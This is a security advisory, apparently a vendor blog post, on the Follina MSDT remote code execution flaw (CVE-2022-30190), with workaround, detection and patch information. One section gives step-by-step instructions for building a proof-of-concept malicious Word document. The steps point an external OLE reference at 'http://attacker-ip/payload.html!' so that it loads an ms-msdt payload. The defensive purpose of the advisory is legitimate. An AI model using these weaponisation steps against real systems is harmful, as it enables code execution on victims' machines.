Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190)

Security researchers have discovered a new zero-day vulnerability in Microsoft Office, via Microsoft Support Diagnostic Tool (MSDT), that could be exploited to achieve code execution on affected systems simply by opening a malicious Word document. 
  
The vulnerability, tracked as CVE-2022-30190, was discovered by a Japanese security researcher nao_sec, who tweeted a warning about the zero-day over the weekend. Security researcher Kevin Beaumont named the vulnerability “Follina” because the spotted sample on the file references 0438, which is the area code of Follina in Italy. 
 
Description 
 
This remote code execution vulnerability (CVE-2022-30190) exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this flaw can execute arbitrary code with the calling application’s privileges. 
 
Security researcher nao_sec found a malicious Word document submitted to the Virus Total scanning platform from an IP address in Belarus. “Interesting maldoc was submitted from Belarus. It uses Word’s external link to load the HTML and then uses the “ms-msdt” scheme to execute PowerShell code.”- he tweeted. 
 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190)
Image source: nao_sec 
 
Security researcher Kevin Beaumont has explained in a blog post that the document uses the Word remote template feature to retrieve an HTML file from a remote web server. This file uses the ms-msdt MSProtocol URL scheme to load some code and execute PowerShell commands.  
 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190)
Image source: Kevin Beaumont 
 
The Protected View function in Microsoft Office does activate to warn users of the possibility of a malicious document, according to the researcher. However, by converting the document to a Rich Text Format (RTF) file, the exploit runs without even opening the document.  
 
Steps for PoC replication 
 
MS Office docx files may contain external OLE Object references as HTML files. The HTML sceme “ms-msdt:” calls up the msdt diagnostic tool, which can run arbitrary code without the use of macros. 
 
Here are the steps to build a Proof-of-Concept docx:

    • Create a Word document and insert an (OLE) object as a Bitmap Image and save it as a docx file.
    • Edit the word/_rels/document.xml.rels in the docx structure using a file archiver such as 7 ZIP. 

Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190) Image Source: Qualys Labs

  • Modify the XML tag <Relationship> with attribute Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" and Target="embeddings/oleObject1.bin" by changing the Target value and adding the attribute TargetMode as follows: 

Target = "http://attacker-ip/payload.html!" 
TargetMode = "External" 
 
Note the Id value (probably it is “rId5”). 
 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190)
Image Source: Qualys Labs

  •  Edit word/document.xml. Search for the "<o:OLEObject ..>" tag (with r:id=”rd5″) and change the attribute from Type="Embed" to Type="Link" and add the attribute UpdateMode="OnCall". 

Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190) Image Source: Qualys Labs

  • Serve the PoC html payload with the ms-msdt scheme at http://<payload_server>/payload.html:

Note: The comment line with AAA should be repeated multiple times to fill up enough space to trigger the payload.  
 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190)
Image Source: Qualys Labs
 
The word document causes the victim system to send a request to the attacker’s IP for the payload.html. The following Apache logs demonstrate the request for the payload.html.  

Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190) Image Source: Qualys Labs 
 
This results in the victim server to execute the PowerShell command defined within the payload.html and execute the arbitrary code of the attacker’s choice. 
 
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190)
Image Source: Qualys Labs 
 
Workaround 
 
Microsoft has recommended disabling the MSDT URL protocol as a temporary fix. Disabling the MSDT URL protocol prevents troubleshooters from being launched as links, including links throughout the operating system. The following steps can be taken to disable the MSDT protocol.

  1. Run Command Prompt as Administrator.
  2. Back up the registry key and execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”
  3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”

How to mitigate the risk until the vulnerability is remediated

1. Workaround/Mitigation Detection

Qualys Policy Compliance customers can evaluate workaround based on the following Control 24074 Status of the ‘Microsoft Support Diagnostic Tool (MSDT)’ service

2. Executing workaround using Qualys CAR
Qualys Custom Assessment and Remediation (CAR) customers can perform the provided mitigation steps by creating a PowerShell script and executing it on the vulnerable assets.

Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190)

How to undo the workaround 

  1. Run Command Prompt as Administrator.
  2. To back up the registry key, execute the command “reg import filename” 

Mitigation
On Tuesday, June 14, 2022, Microsoft issued Windows updates to address this vulnerability. Microsoft recommends installing the updates as soon as possible in a post on the Microsoft Security Response Center. For more information, please refer to the Microsoft Security Advisory 
 
Qualys Detection  
Qualys customers can scan their devices with QID 91909 to detect vulnerable assets.  

QID 91909 is updated on June 14, 2022, after Microsoft released the patch to fix the zero-day vulnerability. The QID checks for patches only. QID 45538 is an information gathering QID that checks if the workaround for the vulnerability is applied.

Continue to follow Qualys Threat Protection for more coverage on the latest vulnerabilities.  
  
References 
https://gist.github.com/tothi/66290a42896a97920055e50128c9f040  
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190 
https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e 
https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/  
https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ 

Leave a Reply

Your email address will not be published. Required fields are marked *